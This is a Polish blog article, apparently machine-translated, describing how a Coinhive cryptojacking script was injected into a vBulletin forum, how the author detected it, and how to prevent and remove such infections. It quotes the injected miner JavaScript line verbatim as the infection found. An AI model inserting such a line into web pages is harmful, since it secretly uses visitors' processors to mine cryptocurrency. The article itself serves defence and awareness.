Jak usunąć skrypt kryptograficzny Coinhive ze swojej strony

Zazwyczaj odwiedzam forum codziennie i nie widziałem go dzień wcześniej. Zakładam więc, że zdarzyło się to w czasie nocy, mojego czasu, kiedy spałem.

Używam oprogramowania vBulletin na forum i zostało ono zaktualizowane do najnowszej wersji. Co więcej, było to dla nas dość zaskakujące, ponieważ domena TheWindowsClub.com używa Sucuri Web Antivirus & Firewall , aby chronić się przed atakami i atakami sieciowymi w Internecie.

Oprogramowanie zabezpieczające moje PC skutecznie powstrzymało złośliwy skrypt przed uruchomieniem na moim komputerze z systemem Windows 10. Sprawdziłem w innych przeglądarkach takich jak Chrome i Edge, a wyniki były takie same.

Po kliknięciu prawym przyciskiem myszy na stronie internetowej forum i sprawdzeniu kodu źródłowego, stwierdziłem, że był to złośliwy skrypt CryptoMiner CoinHive.

To jest złośliwy Coinhive Javascript, który dostał się do mojego kodu na forum:

var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

W każdym razie, pierwszą rzeczą, którą zrobiłem było wzięcie na forum i poinformuj Sucuriego.

Ludzie z Sucuri wyczyścili forum skryptu Coinhive, który został wepchnięty na moje forum w ciągu kilku godzin, a wszystko było w porządku.

Co to jest CoinHive

Coinhive oferuje górnik JavaScript dla kryptowaluty Monero, którą możesz zamieścić na swojej stronie i użyć procesora komputerów odwiedzających stronę, aby wydobywać monety.

To się nazywa Cryptojacking . Polega ona na przejęciu przeglądarek użytkowników w celu wydobycia kryptowalut. Niektórzy właściciele witryn mogą używać go do zarabiania pieniędzy - ale w naszym przypadku został on wstrzyknięty.

Kiedy użytkownik uzyskuje dostęp do zainfekowanej strony, JavaScript Coinhive wykonuje i kopie Monero wykorzystując zasoby procesora użytkownika. Może to spowodować spowolnienie procesora i niespodziewaną awarię systemu maszyny ofiary.

Teraz, jeśli Twoja przeglądarka jest zainfekowana, zobaczysz, że wykorzystanie zasobów rośnie. Zamknij przeglądarkę i spadnie. Użytkownik może zauważyć nagrzewanie się swojego urządzenia, szybkie działanie wentylatora lub szybkie rozładowanie baterii.

Poprosiłem mojego kolegę, Saurabha Mukhekara, aby odwiedził moje forum za pomocą Mac i zobaczył, co się stało. Cóż, jego komputer Mac również został dotknięty, gdy otwierał forum z Safari! Jest jednym z tych inteligentnych użytkowników Mac OSX, którzy używają oprogramowania antywirusowego na swoim Macu. Jego program antywirusowy Avast dla komputerów Mac pomyślnie zatrzymał złośliwy skrypt.

Saidabh,

CoinHive malware nie tylko przechwytuje komputer z systemem Windows, ale także Maca, ponieważ jest to infekcja JavaScript w przeglądarce. Dobrze, że nie wierzę w to, że komputery Mac nie potrzebują oprogramowania antywirusowego, inaczej moja maszyna byłaby zainfekowana, a mój Mac nadal by wyrzucał monety dla kogoś innego.

Zapobiegaj zarażeniu CoinHive przez twoją stronę

1. Nie używaj żadnych szablonów lub wtyczek NULL na swojej stronie / forum
2. Zachowaj swój CMS zaktualizowany do najnowszej wersji
3. Regularnie aktualizuj swoje oprogramowanie hostingowe (PHP, bazy danych itp.).
4. Zabezpiecz swoją witrynę za pomocą dostawców zabezpieczeń internetowych, takich jak Sucuri, Cloudflare, Wordfence itp.
5. Podejmij podstawowe środki ostrożności, aby zabezpieczyć swojego bloga.

Usunięcie górnika CoinHive z witryny

Po pierwsze, musisz zostać webmasterem zainfekowana strona internetowa - lub poświadczenia administracyjne zapewniające dostęp do wszystkich plików witryny.

Teraz, gdy program antywirusowy wykryje infekcję CoinHive, kliknij prawym przyciskiem myszy na stronie internetowej i wybierz Wyświetl kod źródłowy. Następnie naciśnij Ctrl + F i wyszukaj "CoinHive".

Po zidentyfikowaniu lokalizacji złośliwego kodu, musisz zobaczyć jego pozycję - gdzie się znajduje. Teraz musisz usunąć go ręcznie. Aby to zrobić, potrzebujesz trochę wiedzy o kodowaniu swojej platformy. Będziesz musiał zlokalizować zainfekowane pliki / pliki i ręcznie usunąć z niego powyższy skrypt. Jeśli nie jesteś tego pewien, poproś o to eksperta. Ponieważ używamy Sucuriego, pozwalamy im to zrobić.

Po wykonaniu tej czynności wyczyść pamięć podręczną serwera i przeglądarki. Jeśli używasz wtyczek pamięci podręcznej lub powiedz MaxCDN, wyczyść te pamięci podręczne.

Zabezpiecz się przed skryptami do wyszukiwania kryptograficznego

Cryptocurrencies i technologia Blockchain przejmują kontrolę nad światem. Ma to wpływ na globalną gospodarkę i powoduje również zakłócenia technologiczne. Wszyscy zaczęli skupiać się na tak lukratywnym rynku - w tym również hakerzy witryn. Wraz ze wzrostem zwrotów powinniśmy oczekiwać, że takie technologie będą wykorzystywane niezgodnie z przeznaczeniem. To jest ciemna strona każdej nowej technologii.

Możemy zrobić wszystko, aby zachować jak najlepsze środki ostrożności. Poza korzystaniem z dobrego oprogramowania zabezpieczającego, użyj rozszerzenia przeglądarki Chrome lub Firefox, które blokuje witryny internetowe z wykorzystaniem twojego CPU do kopania Kryptowaluty - albo lepiej użyj Anti-WebMiner, który zatrzyma ataki Cryptojacking Mining Script, modyfikując twój plik Hosts. Działa na wszystkich przeglądarkach. Jeśli jesteś użytkownikiem komputera Mac, skorzystaj z oprogramowania antywirusowego również dla tego komputera.

Jeśli masz wrażenie, że odwiedziłeś zainfekowaną stronę, dobrym pomysłem jest wyczyszczenie przeglądarki. buforuj i skanuj urządzenie za pomocą oprogramowania antywirusowego, a także programu AdwCleaner.

Zachowaj bezpieczeństwo, bądź czujny!